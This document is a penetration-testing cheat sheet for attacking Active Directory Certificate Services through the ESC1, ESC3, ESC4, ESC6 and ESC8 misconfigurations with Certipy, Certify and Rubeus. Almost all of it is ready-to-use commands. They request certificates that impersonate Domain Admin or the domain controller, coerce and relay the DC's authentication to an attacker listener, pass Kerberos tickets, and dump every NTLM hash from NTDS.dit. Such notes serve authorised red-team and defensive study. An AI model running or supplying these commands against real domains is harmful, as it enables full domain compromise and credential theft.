ADCS

Linux (Certipy-ad)

Search for vulnerable certificate templates

certipy-ad find -u <USERNAME> -p '<PASSWORD>' -dc-ip <DC-IP> -enabled -vulnerable -stdout

# In case of SSL error (Got error: socket ssl wrapping error: [Errno 104] Connection reset by peer)
ertipy-ad find -u <USERNAME> -p '<PASSWORD>' -dc-ip <DC-IP> -ldap-scheme ldap -ldap-port 389 -no-ldap-channel-binding -no-ldap-signing -stdout

Request SID for a certain user you want to impersonate

certipy-ad account -u '<USERNAME>' -p '<PASSWORD>' -dc-ip <DC-IP> -user '<IMPERSONATED-USER>' read

ESC1

# Request certificate
certipy-ad req -dc-ip <DC-IP> -u <USERNAME>@<FQDN> -p '<PASSWORD>' -template <VULNERABLE-TEMPLATE-NAME> -upn <DA-USER>@<FQDN> -ca <CA> -target <DC-IP> -sid <SID>

# Authenticate with (base64)certificate to get NTLM hash
certipy-ad auth -pfx <FILENAME>.pfx -dc-ip <DC-IP>
nxc smb <DC-IP> --pfx-base64 <FILENAME>.pfx -u <IMPERSONATED-USER>

# Dump NTDS.dit NTLM hashes using impacket-secretsdump
impacket-secretsdump <FQDN>/<IMPERSONATED-USER>@<DC-IP> -hashes :<NTLM-HASH> -just-dc-ntlm

ESC3

certipy-ad req -u <username> -p <password> -ca <CA> -target <domain> -template <vulnerable_template>

certipy-ad req -u <username> -p password -ca <CA> -target <domain> -template <vulnerable_template> -on-behalf-of administrator -pfx <pfx_file>

certipy-ad auth -pfx <pfx_file> -dc-ip <ip>

ESC4

# Backup current template settings
certipy-ad template -u '<USERNAME>@<DOMAIN-FQDN>' -p '<PASSWORD>' -template '<TEMPLATE-NAME>' -save-configuration '<FILENAME>.json'
# Modify template to make vulnerable to ESC1
certipy-ad template -u '<USERNAME' -p '<PASSWORD>' -template '<TEMPLATE-NAME>' -write-default-configuration -dc-ip <DC-IP>
# Now perform ESC1 steps
# Revert template
certipy-ad template -u '<USERNAME>@<DOMAIN-FQDN>' -p '<PASSWORD>' -template '<TEMPLATE-NAME>' -write-configuration '<FILENAME>.json'

ESC6

User specified SAN should be enabled and patch KB5014754 should not be installed

# Request Domain Admin certificate with User template
certipy-ad req -ca <CA-FQDN> -dc-ip <DC-IP> -u <USERNAME> -p '<PASSWORD>' -template User -target <DC-FQDN> -upn Administrator@<FQDN>

# Authenticate with Domain Admin certificate
certipy auth -pfx administrator.pfx

# Dump NTDS with Domain Admin certificate
nxc smb <DC-IP> --pfx-cert <PFX-FILE> -u "Administrator" --ntds

ESC8

Web enrollment should be enabled on HTTP(S) and Request Disposition should be set to "Issue"

# Relay incoming NTLM traffic to the CA
certipy-ad relay -target <VULNERABLE-CA> -template DomainController

# Force the DC to authenticate to our listener
nxc smb <DC-IP> -M coerce_plus -o LISTENER="<ATTACKER_IP>"

# Dump NTDS with impersonated machine account
nxc smb <DC-IP> --pfx-cert <PFX-FILE> -u "<DC-HOSTNAME>$" --ntds

Windows (Certify.exe)

Installation

# Download latest release
git clone https://github.com/GhostPack/Certify.git

# Use Visual Studio code to compile executable
Open up the project .sln, choose "Release", and build.
Executable can be found at: Certify\Certify\bin\Release\Certify.exe

ESC1

# Find vulnerable templates
.\Certify.exe enum-templates --filter-enabled --filter-vulnerable --hide-admins

# Request certificate
.\Certify.exe request --ca <PUBLISHING CAs> --template <VULNERABLE-TEMPLATE> --upn <IMPERSONATED-USER> --sid <SID-IMPOERSONATED-USER>

# Pass the Ticket with Rubeus
.\Rubeus.exe asktgt /user:<IMPERSONATED-USER> /domain:<DOMAIN-FQDN> /certificate:<BASE64-CERTIFICATE-OUTPUT> /ptt /enctype:aes256

ESC1 from Domain Computer

# First add the Windows VM to the AD domain
Settings > Accounts > Access work or school > Connect > Join this device to a local Active Directory domain > Enter domain name & credentials > Restart

# Open PowerShell as NT-AUTHORITY\SYSTEM and request certificate
.\Certify.exe request --ca <PUBLISHING CAs> --template <VULNERABLE-TEMPLATE> --upn <IMPERSONATED-USER> --sid <SID-IMPOERSONATED-USER> --machine

# Pass the Ticket with Rubeus
.\Rubeus.exe asktgt /user:<IMPERSONATED-USER> /domain:<DOMAIN-FQDN> /certificate:<BASE64-CERTIFICATE-OUTPUT> /ptt /enctype:aes256